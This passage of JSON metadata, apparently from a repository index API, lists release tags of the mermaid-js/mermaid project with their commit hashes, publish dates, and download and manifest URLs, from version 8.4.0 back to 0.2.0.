mit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/re